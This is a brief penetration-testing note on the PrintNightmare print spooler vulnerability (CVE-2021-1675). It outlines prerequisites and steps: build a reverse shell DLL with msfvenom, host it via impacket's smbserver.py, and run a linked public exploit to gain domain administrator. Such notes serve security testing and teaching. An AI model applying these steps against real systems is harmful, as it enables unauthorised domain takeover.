Requirements

  • domain user
  • unpatched server (prior to 2019 and without backported update)

PrintNightmare was a CVE that allowed any authenticated user to remotely install a printer driver via the print spooler service, which is enabled by default and could be used to privilege-escalate to domain administrator on a DC. This vulnerability was fixed in 2021.

To exploit, use msfvenom to generate a reverse shell DLL. Use smbserver.py (impacket) to host the DLL (make sure to pass -smb2support flag).

Use the script below to exploit (username and password required; see example) GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightm…